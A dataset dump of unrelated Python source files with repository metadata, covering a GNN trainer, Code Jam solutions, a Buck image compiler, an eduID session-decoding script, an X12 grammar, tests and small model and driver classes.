self.task_ratio = opt['task_ratio']
self.loss_func = nn.CrossEntropyLoss()
self.opt = opt
self.ema = ema
self.model = model
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
self.ss_classifier = nn.Linear(opt['hidden_dim'], partition_num, bias=False)
if opt['cuda']:
self.criterion.cuda()
self.ss_classifier.cuda()
self.parameters.append(self.ss_classifier.weight)
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def reset(self):
self.model.reset()
if self.ema == True:
self.optimizer = get_optimizer(self.opt['optimizer'], self.parameters, self.opt['lr'], self.opt['decay'])
def update(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.train()
self.optimizer.zero_grad()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
loss.backward()
self.optimizer.step()
return loss.item()
def update_soft(self, inputs, target, idx, idx_u):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
logits= self.model(inputs)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
return loss, loss0
def update_soft_aux(self, inputs, target,target_discrete, idx, idx_unlabeled, adj, opt, mixup_layer, idx_u):
"""uses the auxiliary loss as well, which does not use the adjacency information"""
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
idx_unlabeled = idx_unlabeled.cuda()
self.model.train()
self.optimizer.zero_grad()
mixup = True
if mixup == True:
# get the supervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix=mixup_layer)
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0[idx_u], self.partition_labels[idx_u])
mixed_target = lam*target_a + (1-lam)*target_b
loss = bce_loss(softmax(logits[idx]), mixed_target)
# get the unsupervised mixup loss #
logits, target_a, target_b, lam = self.model.forward_aux(inputs, target=target, train_idx= idx_unlabeled, mixup_input=False, mixup_hidden = True, mixup_alpha = opt['mixup_alpha'],layer_mix= mixup_layer)
mixed_target = lam*target_a + (1-lam)*target_b
loss_usup = bce_loss(softmax(logits[idx_unlabeled]), mixed_target)
else:
logits = self.model.forward_aux(inputs, target=None, train_idx= idx, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss = -torch.mean(torch.sum(target[idx] * logits[idx], dim=-1))
'''
logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0, self.partition_labels)
'''
logits = self.model.forward_aux(inputs, target=None, train_idx= idx_unlabeled, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss_usup = -torch.mean(torch.sum(target[idx_unlabeled] * logits[idx_unlabeled], dim=-1))
return loss, loss_usup, loss0
def evaluate(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.eval()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
preds = torch.max(logits[idx], dim=1)[1]
correct = preds.eq(target[idx]).double()
accuracy = correct.sum() / idx.size(0)
return loss.item(), preds, accuracy.item()
def predict(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def save(self, filename):
params = {
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()
}
try:
torch.save(params, filename)
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.optimizer.load_state_dict(checkpoint['optim'])
| [
"[email protected]"
] | |
fa3e535aaacaa3dafcb031f0333a8778da9d2e30 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_97/1531.py | 9246536e333923658ae3a6c8448940cb36f0d831 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | def check(x, mn, mx):
global pairs
pcheck = []
x = str(x)
if len(x) == 1:
pass
if len(x) == 2:
if x[0] != x[1]:
first = x[::-1]
if int(first) > int(x):
pcheck.append(int(first))
if len(x) == 3:
second = x[1:]+x[0]
third = x[-1]+x[0:-1]
if second != x and second[0] != '0' and int(second) > int(x):
pcheck.append(int(second))
if third != x and third[0] != '0' and int(third) > int(x):
pcheck.append(int(third))
for item in pcheck:
if item >= mn and item <= mx:
pairs += 1
def recycle(numbers):
global pairs
pairs = 0
parameters = numbers.split()
for x in range(int(parameters[0]), int(parameters[1])+1):
check(x,int(parameters[0]),int(parameters[1]))
testcases.append(pairs)
testcases = []
pairs = 0
f = file('C-small-attempt2.in', 'r')
for line in f:
if len(line.split()) > 1:
recycle(line)
f.close()
f1 = file('outputC.txt', 'w')
for x in range(1, len(testcases)+1):
f1.write("Case #"+str(x)+": "+str(testcases[x-1])+'\n')
f1.close()
| [
"[email protected]"
] | |
d44c38b442f4ea146ddaa3080d9f72ed2c617fa8 | 025c1cc826722d558d43854f3e319917e199d609 | /infra_macros/macro_lib/convert/container_image/compiler/compiler.py | 6cfddefcce8817aa2d14a9321c253ab846c2820a | [
"BSD-3-Clause"
] | permissive | martarozek/buckit | 73440be29a2ce64084016fc395a5a8cc9bc1e602 | 343cc5a5964c1d43902b6a77868652adaefa0caa | refs/heads/master | 2020-03-26T06:07:35.468491 | 2018-08-12T17:34:04 | 2018-08-12T17:45:46 | 144,590,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,345 | py | #!/usr/bin/env python3
'''
This is normally invoked by the `image_layer` Buck macro converter.
This compiler builds a btrfs subvolume in
<--subvolumes-dir>/<--subvolume-name>:<subvolume-version>
To do so, it parses `--child-feature-json` and the `--child-dependencies`
that referred therein, creates `ImageItems`, sorts them in dependency order,
and invokes `.build()` to apply each item to actually construct the subvol.
'''
import argparse
import itertools
import os
import subprocess
import sys
from subvol_utils import Subvol
from .dep_graph import dependency_order_items
from .items import gen_parent_layer_items
from .items_for_features import gen_items_for_features
from .subvolume_on_disk import SubvolumeOnDisk
# At the moment, the target names emitted by `image_feature` targets seem to
# be normalized the same way as those provided to us by `image_layer`. If
# this were to ever change, this would be a good place to re-normalize them.
def make_target_filename_map(targets_followed_by_filenames):
'Buck query_targets_and_outputs gives us `//target path/to/target/out`'
if len(targets_followed_by_filenames) % 2 != 0:
raise RuntimeError(
f'Odd-length --child-dependencies {targets_followed_by_filenames}'
)
it = iter(targets_followed_by_filenames)
d = dict(zip(it, it))
    # A hacky check to ensure that the target corresponds to the path. We
# can remove this if we absolutely trust the Buck output.
if not all(
t.replace('//', '/').replace(':', '/') in f for t, f in d.items()
):
raise RuntimeError(f'Not every target matches its output: {d}')
return d
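# Example (added for illustration): ['//foo:bar', 'buck-out/foo/bar/out']
# maps to {'//foo:bar': 'buck-out/foo/bar/out'}; the sanity check passes
# because '//foo:bar'.replace('//', '/').replace(':', '/') == '/foo/bar',
# which is a substring of the output path.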
def parse_args(args):
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'--subvolumes-dir', required=True,
help='A directory on a btrfs volume to store the compiled subvolume '
'representing the new layer',
)
parser.add_argument(
'--subvolume-name', required=True,
help='The first part of the subvolume directory name',
)
parser.add_argument(
'--subvolume-version', required=True,
help='The second part of the subvolume directory name',
)
parser.add_argument(
'--parent-layer-json',
help='Path to the JSON output of the parent `image_layer` target',
)
parser.add_argument(
'--child-layer-target', required=True,
help='The name of the Buck target describing the layer being built',
)
parser.add_argument(
'--child-feature-json', required=True,
help='The path of the JSON output of the `image_feature` that was '
'auto-generated for the layer being built',
)
parser.add_argument(
'--child-dependencies',
nargs=argparse.REMAINDER, metavar=['TARGET', 'PATH'], default=(),
help='Consumes the remaining arguments on the command-line, with '
'arguments at positions 1, 3, 5, 7, ... used as Buck target names '
'(to be matched with the targets in per-feature JSON outputs). '
'The argument immediately following each target name must be a '
'path to the output of that target on disk.',
)
return parser.parse_args(args)
def build_image(args):
subvol = Subvol(os.path.join(
args.subvolumes_dir,
f'{args.subvolume_name}:{args.subvolume_version}',
))
for item in dependency_order_items(
itertools.chain(
gen_parent_layer_items(
args.child_layer_target,
args.parent_layer_json,
args.subvolumes_dir,
),
gen_items_for_features(
[args.child_feature_json],
make_target_filename_map(args.child_dependencies),
),
)
):
item.build(subvol)
try:
return SubvolumeOnDisk.from_subvolume_path(
subvol.path().decode(),
args.subvolumes_dir,
args.subvolume_name,
args.subvolume_version,
)
except Exception as ex:
raise RuntimeError(f'Serializing subvolume {subvol.path()}') from ex
if __name__ == '__main__': # pragma: no cover
build_image(parse_args(sys.argv[1:])).to_json_file(sys.stdout)
| [
"[email protected]"
] | |
3de5136de3696c4e49370d8ef3420a67e721f6b3 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_149/82.py | 0c7ae5570829193e068ba4471f6d4bad7fb4b56a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | #!/usr/bin/env python
import itertools
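# Greedy: repeatedly remove the smallest remaining value; after the deletion,
# min(i, len(a) - i) is that element's distance to the nearer end of the list.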
def solve(a):
ans=0
while a:
x=min(a)
i=a.index(x)
del a[i]
ans+=min(i,len(a)-i)
return ans
for t in xrange(1,1+int(raw_input())):
n=int(raw_input())
a=map(int,raw_input().split())
ans=solve(a)
print"Case #%d:"%t,
print ans
| [
"[email protected]"
] | |
8cfbe05b9aeb068e2eea79df986d823110f9c019 | 899bac17acf97252a33d91af076ff1f16b975210 | /eduiddashboard/scripts/decode_session.py | 787b570f274e635d56156b7461f3b6945ebfead4 | [] | no_license | isabella232/eduid-dashboard | 91a209f7833f26a7949cecec60df2e501a82f840 | 99cffaa90f41b13ec34f9d057f19630c644df6ee | refs/heads/master | 2023-03-16T05:19:36.184687 | 2018-07-27T12:27:53 | 2018-07-27T12:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,090 | py | # -*- coding: utf-8 -*-
import sys
import pprint
from pyramid.paster import bootstrap
from eduid_common.session.session import SessionManager
import logging
logger = logging.getLogger(__name__)
__author__ = 'ft'
"""
Read and decode a session from Redis. Supply the token (id starting with lower-case 'a')
from an existing session.
"""
default_config_file = '/opt/eduid/eduid-dashboard/etc/eduid-dashboard.ini'
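# Bootstraps the Pyramid app to obtain the session settings, then loads the
# session stored under the given token and pretty-prints its contents.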
def main(token):
env = bootstrap(default_config_file)
settings = env['request'].registry.settings
secret = settings.get('session.secret')
manager = SessionManager(cfg = settings, ttl = 3600, secret = secret)
session = manager.get_session(token = token)
print('Session: {}'.format(session))
print('Data:\n{}'.format(pprint.pformat(dict(session))))
return True
if __name__ == '__main__':
try:
if len(sys.argv) != 2:
print('Syntax: decode_session.py aTOKEN')
sys.exit(1)
res = main(sys.argv[1])
if res:
sys.exit(0)
sys.exit(1)
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
ea2f5c0278cf81ce6a961011b597677d80605caa | c6588d0e7d361dba019743cacfde83f65fbf26b8 | /x12/5030/240005030.py | e169346e38e95704c267b8fa6401b8abee37c150 | [] | no_license | djfurman/bots-grammars | 64d3b3a3cd3bd95d625a82204c3d89db6934947c | a88a02355aa4ca900a7b527b16a1b0f78fbc220c | refs/heads/master | 2021-01-12T06:59:53.488468 | 2016-12-19T18:37:57 | 2016-12-19T18:37:57 | 76,887,027 | 0 | 0 | null | 2016-12-19T18:30:43 | 2016-12-19T18:30:43 | null | UTF-8 | Python | false | false | 1,585 | py | from bots.botsconfig import *
from records005030 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'MZ',
}
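# Transaction set structure: each entry gives a segment ID with its min/max
# occurrence counts; LEVEL nests the child segments and loops.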
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'LX', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'NTE', MIN: 0, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
{ID: 'L11', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'MS2', MIN: 0, MAX: 99999},
{ID: 'LS', MIN: 0, MAX: 1, LEVEL: [
{ID: 'MAN', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'L11', MIN: 0, MAX: 99999},
{ID: 'AT7', MIN: 0, MAX: 99999},
{ID: 'CD3', MIN: 0, MAX: 99999},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'Q7', MIN: 0, MAX: 99999},
]},
{ID: 'LE', MIN: 1, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
| [
"[email protected]"
] | |
c70a779cc10fd3ba3fe7aca2d9736f9bcb91c53f | d594f3926f6379ef7c382c608cb211f507240420 | /csunplugged/tests/utils/errors/test_ThumbnailPageNotFoundError.py | b73009b6a4421c213fecea7a8dec041baac543c4 | [
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | uccser/cs-unplugged | 0b9151f84dd490d5b90771a3706327a623d39edc | 363e281ff17cefdef0ec61078b1718eef2eaf71a | refs/heads/develop | 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 | MIT | 2023-09-14T02:15:40 | 2016-08-22T23:16:40 | Python | UTF-8 | Python | false | false | 958 | py | """Test class for ThumbnailPageNotFoundError error."""
from django.test import SimpleTestCase
from utils.errors.ThumbnailPageNotFoundError import ThumbnailPageNotFoundError
from unittest.mock import Mock
class ThumbnailPageNotFoundErrorTest(SimpleTestCase):
"""Test class for ThumbnailPageNotFoundError error.
Note: Tests to check if these were raised appropriately
are located where this exception is used.
"""
def test_attributes(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(exception.generator_name, "Name")
def test_string(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(
exception.__str__(),
"Name did not return a page with a designated thumbnail."
)
| [
"[email protected]"
] | |
26a4deb38675a8c8a8ed12f89b75937b21c93aec | 62e240f67cd8f92ef41ce33dafdb38436f5a9c14 | /tests/parsers/bencode_parser.py | f012685073c77212fcc29cb216201a18d37e4779 | [
"Apache-2.0"
] | permissive | joshlemon/plaso | 5eb434772fa1037f22b10fa1bda3c3cc83183c3a | 9f8e05f21fa23793bfdade6af1d617e9dd092531 | refs/heads/master | 2022-10-14T18:29:57.211910 | 2020-06-08T13:08:31 | 2020-06-08T13:08:31 | 270,702,592 | 1 | 0 | Apache-2.0 | 2020-06-08T14:36:56 | 2020-06-08T14:36:56 | null | UTF-8 | Python | false | false | 839 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Bencode file parser."""
from __future__ import unicode_literals
import unittest
from plaso.parsers import bencode_parser
# Register all plugins.
from plaso.parsers import bencode_plugins # pylint: disable=unused-import
from tests.parsers import test_lib
class BencodeTest(test_lib.ParserTestCase):
"""Tests for the Bencode file parser."""
# pylint: disable=protected-access
def testEnablePlugins(self):
"""Tests the EnablePlugins function."""
parser = bencode_parser.BencodeParser()
parser.EnablePlugins(['bencode_transmission'])
self.assertIsNotNone(parser)
self.assertIsNone(parser._default_plugin)
self.assertNotEqual(parser._plugins, [])
self.assertEqual(len(parser._plugins), 1)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
3d82aea556022fc260397c29a753c5ffa68f69ad | 815f70b6a6e1c58676de2def893baf4f70b0f72c | /apps/restapi/twee/serializers/tip.py | 54ce2848966860f92faa422cc2ccd5e4a37a538b | [
"MIT"
] | permissive | adepeter/pythondailytip | ed6e25578f84c985eea048f4bc711b411cdc4eff | 8b114b68d417e7631d139f1ee2267f6f0e061cdf | refs/heads/main | 2023-05-30T11:07:57.452009 | 2021-06-11T13:42:19 | 2021-06-11T13:42:19 | 375,838,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | py | from rest_framework import serializers
from ....twee.models import PythonTip
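# Serializer for PythonTip; extra_kwargs caps the tip text at 140 characters.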
class TipSerializer(serializers.ModelSerializer):
class Meta:
model = PythonTip
fields = '__all__'
extra_kwargs = {
'tip': {
'max_length': 140
}
}
| [
"[email protected]"
] | |
6f8c5602cdedb6aeec199294867b756d7b4aef58 | 372647ad5f8a40754116c2b79914708e46960aef | /ivi/agilent/agilentMSOX3024A.py | 612461f32a85d96ab8c7187f5deb332e6e19ab84 | [
"MIT"
] | permissive | edupo/python-ivi | 52392decb01bc89c6e1b42cbcbd1295a131e91f5 | 8105d8064503725dde781f0378d75db58defaecb | refs/heads/master | 2020-03-31T21:06:02.059885 | 2018-10-04T12:34:38 | 2018-10-04T12:34:38 | 152,567,486 | 0 | 0 | MIT | 2018-10-11T09:40:35 | 2018-10-11T09:40:32 | Python | UTF-8 | Python | false | false | 1,695 | py | """
Python Interchangeable Virtual Instrument Library
Copyright (c) 2012-2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .agilent3000A import *
class agilentMSOX3024A(agilent3000A):
"Agilent InfiniiVision MSOX3024A IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', 'MSO-X 3024A')
super(agilentMSOX3024A, self).__init__(*args, **kwargs)
self._analog_channel_count = 4
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 200e6
self._init_channels()
| [
"[email protected]"
] | |
ef082f9bb3bf1cae4397163bfce43ab59d77dfac | 90e6860b5370b742f01c0664ac84f14dc1272155 | /examples/helloZiggurat/src/ziggHello/models/zigguratTest/ZigguratTestBase.py | 6f82ebfb51611a2d85ce9a0b6f6c0667be506880 | [] | no_license | sernst/Ziggurat | e63f876b8f2cb3f78c7a7a4dcf79af810a540722 | 4ae09bbd9c467b2ad740e117ed00354c04951e22 | refs/heads/master | 2021-01-17T07:20:17.138440 | 2016-05-27T14:27:43 | 2016-05-27T14:27:43 | 9,278,283 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | # ZigguratTestBase.py
# (C)2013
# Scott Ernst
from ziggurat.sqlalchemy.ZigguratModelsBase import ZigguratModelsBase
#___________________________________________________________________________________________________ ZigguratTestBase
class ZigguratTestBase(ZigguratModelsBase):
"""A class for..."""
#===================================================================================================
# C L A S S
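    # SQLAlchemy declarative flag: abstract bases get no table of their own.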
__abstract__ = True
| [
"[email protected]"
] |